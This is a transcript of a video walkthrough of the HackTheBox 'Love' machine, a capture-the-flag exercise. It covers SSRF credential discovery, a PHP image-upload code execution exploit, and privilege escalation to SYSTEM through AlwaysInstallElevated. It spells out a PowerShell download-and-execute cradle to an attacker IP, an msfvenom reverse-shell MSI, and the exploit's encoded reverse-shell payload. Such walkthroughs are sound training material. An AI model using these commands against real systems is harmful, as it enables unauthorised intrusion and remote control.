What's going on YouTube? This is Ipsec. I'm doing Love from HackTheBox, which was a super fun, easy box that really benefits you if you do good enumeration. It starts off with finding 3 different HTTP ports, 80, 443, and 5000. 5000 has a access denied, and if you go to 80 or 443, it just gives you a blank voting system that has a login prompt. But if you look at the SSL cert, you can find there's a hidden domain. I think it was staging.love.htb. So you access that, and then you can perform a server-side request forgery to access port 5000 and get some credentials for that voting system. Once into the voting system, there's a simple CVE to execute code through an image upload, and then on the box, you can just execute an MSI to get root. Since this is easy, I have done no preparation for this video, and I try to keep them as blind as possible, but when PwnMeow created this box, he asked me to vet it and give him any suggestions, and I happily did so. So I've seen this box like 5 or 6 months ago, but haven't looked at it since. So with that being said, let's jump in. As always, we start off with an Nmap, but I'm doing this box live, so I'm going to create the directory and then do a full port scan to scan all the ports with a -p-. And then, because I'm impatient, I'm going to do --min-rate and set it to 10,000 packets per second because I want it to go fast and I want results quickly. Then I'll do -v for verbose, OA, I'll put all formats, put it in the Nmap directory, which I CD'd into, so I don't have to do Nmap. So you can just do love-all ports and 10.10.10.239, which is the IP address of love. Make sure this Nmap runs with sudo, and it should finish. I wouldn't recommend doing that min rate thing because, as you can see, it does generate errors, so you may miss ports. Additionally, it creates a lot of traffic, so you could take down a switch or something, but it should finish in like 15 to 17 seconds. You may be saying, if it does 10,000 packets per second, there's only 65,535 ports. Why does it take like 15 to 16 seconds? And that's because it does retries and latency on the network and things like that. So it's not exactly 10,000 packets per second in terms of detection, but it is pretty darn quick. So looking at the ports, we have 80, 135, 139. So this is looking like a Windows server once I see 445. I'm going to look for like 3389 or something like that would indicate a domain controller. I don't see it, so I don't think this is a DC. We do have MySQL, and that's pretty much it that's interesting. WinRM here. I don't know what 47,001 is, but apparently it's another WinRM port. So let's do a full script scan so we have something running while we poke at this. So the first thing I'm going to do is cat the results, so all ports.nmap, and then I'm just going to grep for open, and then we can do an awk-F for field separator, and we're going to search for slash and grab everything before it. So /f/, and then print $1. And then I don't know exactly how instead. I always forget when I do this on the fly to break by line breaks, or search by line breaks. So I'm going to take this exact thing that I did in sed and do it in VI, and this is just the only reason I use VI for this. If I could remember the syntax, I'd probably switch to just using sed. I'm going to do ports.list, and then go into ports.list, %, and then the same exact syntax, and boom. We have all the ports on one line, so I can cat ports.list, copy it, and we can do Old Faithful of Nmap. So sudo nmap-sc for default scripts, sv, enumerate versions, oa, output all formats, put in the Nmap directory, but we're CD'd into it already, so we don't have to do that. So we can just do love, and then the IP address of 10.10.10.239, and then -p for ports, and specify all the ports we want. So while that runs, I'm going to check crackmap exec real quick, just because 445 is an easy check. So CME SMB 10.10.10.239, and we should get a header. We can see this is Windows 10 Pro. I don't know exactly what version this is. I don't really pay too much attention to like 18, 19, 20 versions. The name is love, domain is love. Generally, when you see the same name and domain, it means it's going to be not a domain controller. Signing is false. If this was a domain or we had multiple boxes, we may try some relaying attacks. SMB v1 is true. We could try Eternal Blue, but I don't think this version is vulnerable to it. Additionally, that vulnerability is getting pretty old, so it's unlikely to find that, so not even going to worry about it. We're going to try --users to see if we can enumerate potential users on the box. Doesn't look like we can, so I'm just going to go and look at HTTP. So going to 10.10.10.239, we have a page that just says voting system using PHP. So the very first thing I try to do is identify this CMS. So I'm going to go to google.com and search voting system using PHP GitHub and see if we have anything. We have this online voting system. So it goes to online voting, poll. So let's see, is there an online voting directory here? Voting. Doesn't look like there is. We could try logging in with admin, and then when we do this, I always like opening up my developer tools, looking at network so we can see exactly where this request goes. We sent a post request to just /login.php. So we can look at this. This application does have login.php. It has an installation.txt, so we may want to check out that directory. I have a space in front of it, so let's get rid of that. That file does not exist. I'm looking for other things that are unique that I don't see often. Register account.php or register acc.php. It's a relatively unique name for a PHP file, so I'm checking that. And the main thing I'm doing is just trying to find out if this application is this software. So just trying to do a basic fingerprint. It doesn't look like it is since the two files I checked aren't there. The other thing I like looking for is the site icon, which is to the left here, and there is none. If there was, like we can look at this GitHub site icon, we could download it and then go to either Bing or Google, do a reverse image search on that, and maybe find out what the application is that way. But right now we're getting a big fat nothing in terms of a recon. So I always like having things running in the background. So let's set up our Go Busters. And this Nmap, I mean, when I say it may take a while, I mean, oh, there we go. It takes about 3 minutes. So let's set up a Go Buster, then look at Nmap. So Go Buster dir-u HTTP 10.10.10.239-w for word list, opt sec list discovery, web content, raft, small words. And then because this is Windows, I like doing lowercase because NTFS is not case sensitive. So we can look at index.php and then do random casings, and it's still going to pull up the same page. If this was a Linux server, chances are that wouldn't be the case. So this just like shrinks our word list so it goes a bit quicker. -x for extension, I'm going to do PHP, and then -o for out file, we're just going to do gobuster-root.txt. And now let's take a look at Nmap. So let's go into love.nmap and look at this. So we have Apache running. There's nothing too interesting there. 135, 139, nothing interesting. HTTPS, and we have a unique domain here, staging.love.htb. So we should add this into our host file. So sudo /etc host, and we forgot the vi, so sudo vi etc host, and we can do 10.10.10.239 staging.love.htb. There we go. And move on. So we have, after that, the 445, not too interesting. We have MySQL, and it says our host is not allowed to connect to MariaDB, which is MySQL, so not going to do too much poking there. We have port 5000, which is another HTTP thing, and it's saying 403 forbidden. 5040, I don't know. Then we go into this WinRM stuff, also linking the host name. So, nothing too interesting. Two things I want to check is HTTPS, staging.love.htb, and we can do advanced, accept risk and continue, and we get a forbidden here. We can go to 10.10.10.239 on port 5000, and we also just get a forbidden. We can try just HTTP with staging.love.htb, and we get a different web page. We have this free file scanner. So let's try signing up. I'm going to do root and then root at ipsec.rocks, log in, and we see it did a GET request. And looking here, let's see, the actual request, it didn't do any parameters. We could send that to burp because that is weird, but it looks like this sign up today does nothing. So I'm going to do ipsec.rocks, make sure my burp suite is intercepting, send it, And we can see it indeed sends a blank GET request. So we can just completely ignore this page unless we wanted to like fuzz parameters or something. But I'm going to ignore that page and we'll go to demo. And we can see it says specify URL. So let's just try specifying itself, HTTP 10.10.10.239. And we get the page down here. Let's try specifying file : / Oh, we need a Windows thing. Maybe at another Windows System 32. Is it? Let's go to Google. Windows location of license.rtf. Let's see. Windows System 32 license.rtf. license.rtf to see if we can include files. And it doesn't look like we can. We don't have the license.rtf file down here. We can try like remote file inclusion, so HTTP 10.10.10.14.8. And then on our box, we can do sudo nclvnp 80. And HTTP 10.10.14.8. Maybe we have to do a page. I could have swore this should work. Let's see. IP-ADDR. We are 10.10.14.8 indeed. It's weird that my ton is 10 here, but oh well. HTTP. Oh, 10.10.14.8. I had 3 10s. So there we go. It's looking like it's taking a while, and we get a request. The other thing we could do is try to access other ports on this box. So I'm going to send this over to WFUZZ. First, we have to just look at the request. We send a file and read parameter. So we can do wfuzz-u http 10.10.10.238/beta.php, which is this page. We probably need to specify actually the domain name because of virtual host routing. Delete an extra HTTP. And then I'm going to do -z for a unique fuzz. So if we do wfuzz-h, and this is the main reason I'm using wfuzz and not FFUF, because I don't know how to do like a range in FFUF. So if I just do -z range, comma 1 through 65,535, it's going to create a list of that. But I'm going to do 445 to 446 to start out, or 447, because we want to make sure FFUF only, or not FFUF, WFUZZ only shows the open port. So we do that, and then we specify -d for post, and then the parameters. So we need file is equal to HTTP 127.001 fuzz, and then we need the read is equal to scan plus file. So we do this, and we can see 445, all the pages, 445 through 446 is identical, which makes this a little bit hard to fuzz. Well, we can look at like, if we go WFUZZ advanced options maybe, and we have to go to Google. Advanced usage. Let's see. They have a request delay and connection delay, which I think should limit how long it takes for this to respond. Because if you look, we have one immediately, and then it takes like 2 seconds for the other request. We can kind of verify that by going back to burp. If we look at staging love, let's see, beta.php, send this to repeater. So 10.10.14.8, let's change this to 127. Well, we don't need all this, I think. 001.445. We can look at this. It's taking like 90 milliseconds or 100 milliseconds. If we change this to 446, it's now going to take like 2 to 3 seconds because it's waiting for a connection to time out. So we can take advantage of that by doing like --con-delay. It's set to 1. And it looks like that does not work. I was hoping that 446 and 447 wouldn't show up, but it looks like they do. If we set con delay to, let's try the request delay. That looks like it worked. But if we started out at like 443 to 447, well, maybe it works. Let's try 1 to 65,535. Come on. Type. There we go. Let's see. It stops, and it stops after a timeout of 1 second. So let's see. Let's do 2. I wonder if we just have to start this with a valid port. So let's go back to ports.list. Let's start it at 80, because there's nothing below 80 that we know of. Where'd my WFUZZ command go? Was I on that? That's not going to be fun. There we go. So let's start this at 80 and see what happens. So it just stops. So I have a lot of trouble using WFUZZ this way, and I don't know how to do it in FFUF either. So what we're going to do is set this range and just fuzz for HTTP things. So I'm going to do --HW for hide word, and then 392. So we're going to hide everything that's not 392 words. So this should just get anything that responds with a page, which is good enough. If it's not a valid like HTTP thing, we probably won't get a detection here, but this is better than nothing. So we're just fuzzing everything, and I'm probably going to speed up the video and just wait for this to finish. We see port 80, which isn't a surprise because we're just getting that voting system page. But yeah, I'm just going to pause the video and we'll see what this result is. So it finished, but we didn't get the results we expected, or I expected. I only see 80443, and I see a process request. It's under 500. It should be like 65,000. We see it does a timeout, and then I was playing with other options to try to get this working. Up here, I set the con delay to an extra 0, and it still did around 500 requests. Here I'm setting request delay equal to a high number, and it looks like it may be working, but it's going extremely slow. So I'm going to try out FFUF just to see what happens. Let's do for I in sec 1265535 do echo I done, and this will just echo all the ports. So we can direct this into a file called ports, and we should be able to use FFUF now. So FFUF-u HTTP 10.10.10.238, then dash timeout, I think. Let's do FFUF-h actually. I should have just did this in a new pane. So we probably want, let's see, we definitely want -u. We need, that's cookie data, so -d is post. We'll probably need to do a host header because it doesn't like sending application content type. So let's try that. And I don't know why all this ports are saying open. So yeah, WFUZZ is just behaving weird. So timeout 1 -d. Let's just kill that. We can grab this. -w word list. We just do ports and see what happens. That's looking good. Let's do v test, and we'll do 70, 80, 443, 445, 446, 600. So see if this works. Progress 6, and nothing shows up. So this is probably going to be the content headers thing. So I'm just going to do -H, and let's just grab our content type. see if this works. If not, then I guess check the comments and see what I'm doing wrong. Let's see. This. Let's not do encoding. Oh, beta.php. Let's see. Still get 6 errors. Is there verbose? No. I want to just move on and test things manually, but OCD in me wants to get this correct. So -x, and we can specify burp. So -x HTTP 127.0.0.1 port 8080. So let's go to intercept on, send this, scan fuel. That's not it, but it looks like it's working. No route to host. Oh, 10.10.10.239. That would be the error. Scan file. I am glad I troubleshooted that because that would have been embarrassing to read in the comments that I had the wrong IP. So -timeout1. Still not getting anything. I wonder if timeout is in milliseconds. So go to proxy, intercept on, send. Let's see. staging.love.htb. And that's why it's always important to test in Burp Suite. So FFUF looks like it is working. We only got the valid ports. So now we can do -w and specify ports. And we should only get valid ones. So this is a way to identify, what was I going to say? Just the SSRF vulnerability. Hopefully. I expect 139 to be showing up, but it didn't. So the one thing we can do is filter words for 1248 because we don't really care about those. Or I'm going to do it at the end because we may care about them. Just because it's 1248 doesn't mean it's not serving a page. It just means it didn't give us data, but the port was open. We can access it through localhost. So something like SMTP or something, if it's accessible only localhost, may show up like this. In most cases, I really wish there was like an error message that told you the port's open, or an error message that would say port is closed, because then we could just filter on that. But this case, there isn't. So I'm going to just let this run, and we'll see what we get. So this command didn't finish, but I'm not going to let it finish, because if you look, it's doing 19 requests per second, and we have 65,000 requests to send, so this would just take ages. The one thing I'm really curious about is why 139 didn't show up. I'm guessing it's because we connected to that port, and then the port didn't send a response back because we didn't send a valid RPC message, and it just hung there and waited and timed out. So even this message of doing timeouts is not perfect. We do get a hit on 5,000, and it is not 1248. So this is giving us an actual page now, which before it gave us a access denied. I'm just going to Control-C that. The other thing we could have done is went into an Nmap directory and did ports.list, but we'd have to re-put this to be line breaks because we made it all commas. What I mean by that is cat nmap ports.list. We have to change those commas and put it back to new lines. So not going to do that. We have port 5000. That's what I wanted to see. So let's go and check that port out. So if we go to staging love, or this page, and look at 127.0.0.1, port 5000. Let's see what we get. It's probably going into Burp Suite. We get a password dashboard. If we look at this, it looks like it's home and demo here, but voting administration credentials. And we have admin and love is in the air. So we could try like psexec or crackmap-exec. So CME SMB 10.10.10.239-U administrator -P love is in the air. And I'm doing single quotes because this is a special character and that would do weird things to my bash command. Also, normally when you specify an @ sign in like the very first thing, you're trying to include a file. I don't think that's the case for crackmap-exec, but just habit when you have special characters, quote them or escape them. So let's go to this voting system thing. Admin, love is in the air. Do I have that correct? Looks like I do. Let's see. Was it admin? So admin : love is in the air. So we're not sure exactly what these credentials are. This is saying ID though. It's not saying username. If we go back to our GoBuster, maybe there's going to be something else. So let's cat GoBuster root.txt. And let's see. Let's grep -v 403. And we have /login.php, home.php. I was looking for like admin.php, but we have just a /admin. So let's check out /admin. And now it's saying username. So let's do admin, love is in the air. And we get logged in. So we have some header, source code stir. So if I search this now with voting system, and of course we have to go to Google first. And here is the source code for this. So this is the application that is running. This looks very familiar, this page. We can check searchboy to see if there's any exploits out for it. It's just called voting system. And we have an authentication bypass. I wonder if we could have used this to log in. Let's see. This one is new to me. Search exploit -x. Let's see. Set arbitrary passwords for accounts. /online voting. I think we need some ID. So let's see, what is it doing first? Payload ID is equal to 1. Overwrite the username of the victim. Let's just try running this. What's the worst that can happen? We revert the machine. So v4396 2218. So I wonder if I do Python 3 43. Python, oh, it's probably a Python 2 application. Description, proof of concept. Let's just do that. And target site, I wonder if online voting is a page. I don't think it was, but it doesn't hurt to check real quick. Okay, so we can just do 10.10.10.239 and then /. Then run this. Expect a string or bytes like object. I'm guessing this is Python 2. Pip2. Let's see. 2 to 3. Let's just try running this to see if we can quickly convert the script. It was already, I think, Python 3. So I'm not sure exactly what goes on here. So let's not do this exploit because it's not working out of the box, and I'm not positive if it is even vulnerable. So let's do voting system and try a different one. So we have this. And let's see, /vote system. That's a directory. Let's do that -m again real quick. Overwrite it. And we can change the URL to /vote system. 10.10.10.239 /vote system. Need to end that in a quote. Yeah, so not sure what that exploit is. So exploit -x. Let's copy this one. This is going to be 49 -m to mirror. Okay. IP address 10.10.10.239. This is admin. Then let's see, where's love is in the air? Copy this password. Oh, I really hate exploits that do this. 10.10.14. What is our IP? 8. And reverse shell IP. Let's do 9001. So at least it's specifying a Windows server. But this exploit is not really written well. I just say that because I don't like all these like payload replace IP. I'd rather just in the payload itself specify the IP. We also have a image upload thing. So it looks like it's just uploading a image, and that's all the exploit is. So the one thing we should do, let's grep payload on this, head-1, head-2, tail-1. So I just wanted to grab this one line, and we want to unbase64 this. Because whenever I see like base64 in some exploit code, my radar sense goes off, a spidey sense goes off, and it's like, what are you exactly trying to pull on me? So this is a binary, I think. T, file T. I have no idea what this is. Strings T. I thought it was going to be a binary, but I don't get a MZ header from this. Let's see. Started at 7VH. 7V. That's where it started. Eval code. So it's doing a decode, then GZ inflate. So it's decompressing it. So this is just compressed base64. So we can probably copy this. See, GZ inflate. Let's see, let's less this file. Okay, copy this line. I guess we get a little bit of malware reversing in here. That was unexpected. So let's see. Head-2, tail-1, 2, test.php, vi test.php. Go here, paste that eval code, and we can echo eval code. And then I guess we got to do PHP tags. PHP test.php out, file out, ASCII text. Let's see. V test.php. I guess I need PHP there. And that is a PE32. So this is a exe. So if we strings out, we can kind of see what it's doing. This looks like it's a reverse shell. It was compiled with min.gw. We got shell here. It is also UPX packed. But yeah, this is some executable. So if I was on an actual engagement, probably would not be running this exploit because it's just doing enough like unsafe things where I can't validate all the code that's being ran. But this is a HackTheBox machine, and that executable is not being ran on my box, so don't really care. Let's just run this, and it doesn't look like it worked, which could be annoying. Actually, it is annoying. So let's see. Password. I don't know how I did not notice me not copy the right password. I guess that went into a different clipboard. Let's try Control-Shift-Insert. There we go. So we ran netcat, and it's not working. Let's see. Executing. I wonder if Defender or something is catching it. Call shell. So s.get call shell. Let's just print call shell. So it should be on shell.php. So let's just get this page and see what happens. Not found. So it's doing photo, shell.php, payload. So I'm guessing maybe it's getting caught with Defender. We may just want to manually exploit this. So let's do that. Let's see. Send payload login. We can do proxy is equal to HTTP 127.0.0.1.80.80, and then send this to perp. Make sure we intercept if we run this. Let's see, proxy. I'm going to specify HTTP colon, and then do I have to do that for Python? Why are you not going to perp? Let's see. Google.com. This box is turning out to be slightly more difficult than I expected. Let's see. Python request. And then we want to set proxy. Proxy is equal to proxy. Let's see. HTTP. That should be working. HTTP, then 127.0.0.1.80.80. I guess we just manually do this. Let's go 239. We're an admin. Let's see, voters, votes. I'm looking at where I can edit my profile because I'm guessing that's where a picture thing's going to be. So, election title, total voters, number of candidates, nothing there. see. Where is this sending it to? Vote URL. Voters_add. Does that exist here? Here we go. New. There we go. So ipsec password, and then we want to upload a file. So I'm just going to, before I do this, let's open this image in a new tab, save the image, and we can save it to ipsec HTB love, and we can save it there. So this way, when I add this, it's going to have all the metadata of an image already. So HTB love.jpg, burp suite on, save. Here we go. So file name, let's call this ip.php. And instead of this JPEG data, let's just do echo, please subscribe, like this. Send it over to repeater, send it. We got a 302 redirect to voters.php. So now if I go here, and what was it? Is it ip.php it wrote? Or maybe it's /images/ip.php. We have please subscribe. So let's try shell.php here. Yeah, not found. So I'm thinking Defender was removing that binary, because we definitely have a way to write files. So now let's go to repeater, and we can do system request, or is it request CMD? Let's just try that. If I go back to here, and we can say CMD equals dir. There we go. We have code execution. So now let's try to get a shell. Easiest way is probably going to be using Nishang, as long as Defender doesn't catch this. So I'm going to make dir dub, and then we can go into this directory, cp user share Nishang. Then let's see, shells, invoke, PowerShell, tcp.ps1. We can do one line real quick. PowerShell, tcp, one line.ps1. And what one do we want to use? Let's just use the first one. And we can say 10, 10, 14, 8, 9001. Okay. Let's move this to shell.ps1, Python 3, HTTP server. Then send this to burp suite. Go here, convert this request into a post because there's less bad characters here. And, ooh, it's been a while since I did this. PowerShell IEX new-object net.web client download string HTTP 10.10.14.8 8000 shell.ps1. You can put this in double quotes. It's taking a while, which is a good sign. We get a connection back. dir boom, we have a reverse shell. The one thing I'm going to do, or actually two things. Let's clear the screen. Let's do script shell.log and then rl wrap nclvnp 9001. And that rl wrap just gives me the up and down arrow. Uh-oh. Oh, I typed dir in this window. Here we go. Awesome. So I have up and down in this shell, and we are on Windows. So the very first thing I like doing is running WinPEAS. So let's do that. Let's do cd opt privilege escalation script awesome suite, and then I'm just going to do a git pull to update it. And then let's do WinPEAS exe, then do binaries. Oh, I'm already in there. cd binaries, obfuscated release, sure, and then probably WinPEAS x64.exe. So cp this to HTTP love www. And then I'm going to go into, let's just do users public documents, echo test temp dir. We can write in here. So let's do curl 10.10.14.8 8000 WinPEAS x64.exe -o WinPEAS.exe. Downloading this file. And then let's execute it. And hopefully it comes back. Maybe it'll take a while. I was expecting it to like stream results out to the screen, but it doesn't look like it did that. So I'm just going to give this a few minutes to run, and we'll see if it outputs. If not, we'll have to probably execute this a different way. Oh, there we go. Speak of the devil. So let's see. Where is this? Let's go all the way to the top. Why is my terminal hung? There we go. So this is installing all updates. So it looks like this has changed since I last looked at it. We can see the updates were 8.5. So we could look at Windows exploits. Wait. What? So this installed updates when today? The machine doesn't have internet access. I'm confused. Let's see, when is this release date on this KB? Come on, Windows, give me a date. What the heck? Did I just miss the date? '05. So I'm guessing it had pending updates and installed it when the box booted up, because this is not a recent update. Wait. Yeah. I was like, is it going day, month? 414. So let's go down and just look at other things. Look at anything that is red. We have a user, Phoebe. Username system. Laps is not installed. LSA, cache creds. Some AV was detected. Windows Defender. We could have guessed that since it was deleting that payload. Let's see. Any local account can be used for lateral movement. PowerShell history size. We may want to look at this directory. Create. Landman. Let's see. NTLM settings. This gives a lot more output than it used to. See, I don't know what this is. Enumerating named pipes. AMSI. Interesting events. So it's looking for a process logging in with plain text credentials, printing account, process creation. We must be administrator. So let's see. User information, local users, home folders, so we can access Phoebe's directory. See, WinPEAS, DLL hijacking, MySQL. So a lot of these DLL hijacking on services, we'd have to be able to restart the service or reboot the box, so it's not too interesting to me. Write, create, date files. Again, we'd have to reboot the box to take advantage of this. Or also, we have to be able to write to those directories. So many path injections. This is definitely a lot more verbose than I'm used to. Maybe I shouldn't run WinPEAS without looking at the output ahead of time. ODC. Let's see, we have some NTLM-v2 hash, but it's it's Phoebe's NTLM-v2 hash. So we could potentially try to crack her password. Not sure exactly where it got that from. File permissions, PHP cookies, Windows files. So nothing there. But I know something should be there because, like I said in the intro, I helped PwnMeow create this box, so I probably just missed something in all this output. I'm going to search my output for escalate, probably elevate, if I can spell that correctly. And here we go. This is what I wanted. So I was hoping like this was yellow background, red print, but I guess the Windows binary doesn't do that. Because this key is definitely very bad that's set. It's also a MSI key. So I think the output probably should say MSI somewhere here. But we can look at it. Let's see. If these registers are enabled, then any privilege can install and execute MSI as system. So all we have to do is generate a MSI file and have it do a reverse shell. And we should be able to install it with our current user. So let's try that. Going back to our session, let's just go into that HTTP love directory. And we can try msfvenom -p for payload, Windows. Let's just do plist. I think should list all the payloads. Let's see. msfvenom -l payloads. Is this it? I always mess up the flags for this, and I always hate how Ruby applications take a few seconds to give the results. But we can say reverse shell TCP. Let's see. Shell underscore TCP. Reverse underscore. Let's see. x64. Here we go. We just want this reverse shell. So msfvenom -p. We can send this. lhost is equal to 10.10.14.8. lport is equal to 9001. Format is going to be MSI. And we can just call this payload.msi. So this should be generating. And we can try downloading it again. So curl 10.10.14.8, 8000, payload.msi, and then -o, payload.msi. dir. It still exists there, which is a good sign. nclvnp 9001. And we can do msi exec /q/i payload.msi. And it executes. We do a who am I. We are ntauthority /system. So we can go to users, administrator, desktop, and get the flag. Apologies for the sloppy cut. After talking to OXDF, I realized what mistake I made with this exploit script and getting it working, so I want to show just typical debugging around this and spend a little bit more time here, because this is definitely a valuable skill, taking exploit scripts and getting it working. It's not always as easy as, oh, it's just an image upload and we can just put a PHP shell and get code execution. So the mistake I made is it goes to like this /vote system /admin, and if we go to the page, so 10.10.10.239 /vote system, we see it's just an image directory. There's no /admin here, so this doesn't work. And if we go all the way to the bottom and look at how this works, we put our shell here to get the proxy, but I didn't look at up here, it's in an if loop, and it's testing if login. So the script is going to this login function, which is my main mistake. I didn't see this. And we don't log in, so it returns false, and it never hits down here. So we did the proxies right, but it just did not execute. The other thing is looking at this PHP thing. One reason I like Vim is because it makes things so easy. So we can just do like set no wrap, I think. And now line wrapping is disabled, so all this PHP thing is just on one line, so we can easily see what this does. So we have it calling payloads, going PHP, doing this header, and then it's setting IP to $IPP. I don't know why it exactly does this, since it doesn't have to, but that's besides the point. Then we have this payload. This is that gzipped base64 thing that we saw before. And then it's doing eval arguments and adding port and IP. And then it's saving it to C:\Windows temp. And when it executes it, we have it here. It's doing path and then eval arguments. So this isn't msfvenom, because msfvenom things don't really accept arguments. They hard code the IP and port in. This is just a reverse shell that you call the shell and you give it the port and IP, and then it sends you a shell. So that's what that is. And it's nice to know and go through this, because if this wasn't writing to C:\Windows temp that gets erased every reboot, I believe, you're leaving an artifact behind that you have to make sure you clean up. Also, if you're writing detection, you'd say, hey, they didn't see this file create. So also good. And I just don't like running executables that I don't have the source to on client systems, so I'd definitely be changing this, as I said before. So let's go back here and set our hook at this login piece. So if we had done this at the start and went to login and said, let's move proxy up here as well. We probably should make proxy just a global by placing it outside these loops so we don't have to define it multiple times. Actually, let's do that. So let's go up here. We can just go this and set the proxy that way, and then go down to send payload. So now we don't have to redefine it. And say proxies is equal to proxy. And now when I run this script, it should be obvious exactly what's happening. So Python 3, 4945, let's go to burp suite, turn proxy, clear the intercept queue. What? 77. Files. Let's see. I guess I screwed something up here. Let's see, payload. Is that it? Maybe it's just comma. Okay, well, script worked. We do this login. Let's right click and intercept the results of this, or the response. And we can see 404 not found. And then if we ran that again, it's super obvious 404 is because of this vote system thing. We can take that off, intercept the response, and we get a 302 found. And I think that's what the login is saying. So v this, go to login, and let's see, post, if status code is 200, print logged in. So I'm guessing it's following this, going here, and it gets 200 from that. So request will automatically follow things. So you may not you may assume, oh, I got a 302. Well, the request library is going to follow that and then give you the end status code. It does have an option to not follow request. So if we do request, no follow, and of course we have to go to Google first. Let's see, request, probably add Python, and we can say no follow. And go here, we just set allow redirects to false. And then that would be a 302. So then we go to send payload, and I'm assuming if I fix all these URLs by removing this vote system, then it will just magically work. So let's do that. Okay. Let's do Python 3, 49, NC LVNP 9001. I think that's what we set the port to in this. Run the exploit script. So it's making that request, getting admin, going to home. Here's this add thing. Now we're uploading the PHP reverse shell, sending it to 10.10.14.8, 9001. Forward. It's getting that. And we should, get a shell here. So this is what we have, and it tells us B374K shell. So again, let's go to Google. Let's see, this is a PHP web shell. Does this do the default thing? Let's see. Doesn't look like it. Base. I don't see any C code or executables. Module, same thing. So I don't know exactly what this web shell is doing, but that is the exploit. And oddly, it did not write to C:\Windows temp. It just dropped it here. Let's see, C:\Windows temp. Not found. I think we have to be admin. Do I have something here? I do. dir C:\Windows temp. Do we have any exes? I do not. So one of the things in this PHP thing actually broke because it didn't place it where we thought it would. We can easily go to HTTP history. Let's look for the post. Can we just easily filter this? That's only by pro. See, I can probably just sort by method and go to the bottom, post to beta, admin login, maybe length, sort by length and go to the biggest one because we're sending an entire. Instead of just searching for this, let's just go proxy intercept and redo it. So go with this netcat, we can exit. Listen, run. Let's see, here's the login. And here's the shell. So it runs that. Then we do gzinflate, temp directory. So it's changing to tempdir. So this chdir actually fails. I'm not sure why. I think it fails. File name, fopen. Yeah, because it's doing this fopen here. So something fails in this chdir command. Again, not sure what, but if it didn't, the web shell would not be in the current directory. Let's see, what is file name? Default shell. Yeah, it doesn't have any path. So wonder if we escape that. That's going to be my first guess at what went wrong. And then we don't get a callback. Let's see. dir C:\Windows temp. So there we go. Now it actually uploaded to C:\Windows temp, but somewhere else the script errored out. So that was that issue. I'm not going to further troubleshoot it. The one thing I think would make this code a bit easier to read, let's just, is this it? Oh no, that's the auth bypass, which I guess we could or should look at it, but I'm sure there'll be a write-up somewhere online that digs into that. Let's see. Oh, that's funny. The exploit script probably needs this. So, because this is double quoted, we escaped the backslash in Python, so it only put one backslash in PHP, and then PHP was treating this as an escape, and that's why it failed, because it was escaping W, which means that backslash did nothing. So in the exploit script, you'd probably want to put two of these, or have it in single quotes, because single quotes won't obey that escape. But how I would do this is all these functions, I would have them return some things. So down here in this main, I would also put like a, probably a main function here, but I would do login here. So I would say session is equal to login, and then also have IP for like URLs instead of doing it all hard-coded. And then on this, we'd say print logged in and return r.cookies. I'm guessing that's it in request. Let's see. Session is equal to this. I guess we can say cookies and cookies. Cookies. And we can also import pdb, pdb.set trace to make sure cookies is what we think it is. So we can do Python 349, return, invalid syntax. Of course it is. There we go. Turn intercept off. We hit this. We can look at what cookies is equal to, and it's request cookies.jar. Send payload is 1. So this can be cookies. Then you can take this if login feature out. And in here we can say cookies is equal to cookies and see if that works. It may not. Again, I'm doing this all on the fly, and that always introduces bugs. So we're logging in. We have this PHP session, RDNE. So when we go to the next thing, expect if I can type, it would be great. So logging in, we have this cookie now. And we can see our post is actually giving the right cookie, so we did everything correct. We'd have to fix up the shell exec next. But I would say that, and then say if cookies, and then send payload in this. Else login failed, and we have to print that. But I think something like this would be easier to read. I just really hate when it's simple like this, calling function and function, and then having to really trace it instead of having it right up front. But that may be just me. I guess maybe check the comments to see if people argue with how I would say to fix this program. But that'll be it for the video. Take care, and see you guys next week.